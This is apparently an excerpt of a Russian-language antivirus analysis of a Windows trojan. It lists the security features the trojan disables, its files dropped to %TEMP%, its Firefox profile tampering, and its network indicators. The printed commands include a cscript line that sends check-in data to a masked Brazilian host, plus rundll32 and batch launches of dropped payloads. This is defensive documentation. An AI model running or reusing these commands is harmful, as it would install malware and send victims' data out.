Техническая информация
- Компонент восстановления системы (SR)
- Средство контроля пользовательских учетных записей (UAC)
- Центр обеспечения безопасности (Security Center)
- '<SYSTEM32>\attrib.exe' +r "%APPDATA%\Mozilla\Firefox\Profiles\cwdgt0y8.default\prefs.js"
- '<SYSTEM32>\cscript.exe' //nologo "%TEMP%\send24183.vbs" "http://uo#.###hecaauol.com.br/black/?" "tipo=alivei&cliente=teste"
- '<SYSTEM32>\attrib.exe' -r -a -s -h "%APPDATA%\Mozilla\Firefox\Profiles\cwdgt0y8.default\prefs.js"
- '<SYSTEM32>\rundll32.exe' shell32.dll,Control_RunDLL "%TEMP%\install.cpl",
- '<SYSTEM32>\cmd.exe' /c %TEMP%\ievlzTgTivgDFpCFlhtFtQhhQsfqfHwPGiBtQrIcwqxjUnOqi.bat
- %TEMP%\CRNJEUFU.txt
- %TEMP%\send24183.vbs
- %TEMP%\install.cpl
- %TEMP%\ievlzTgTivgDFpCFlhtFtQhhQsfqfHwPGiBtQrIcwqxjUnOqi.bat
- %TEMP%\ievlzTgTivgDFpCFlhtFtQhhQsfqfHwPGiBtQrIcwqxjUnOqi.bat
- 'uo#.###hecaauol.com.br':80
- 'localhost':1037
- DNS ASK uo#.###hecaauol.com.br
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'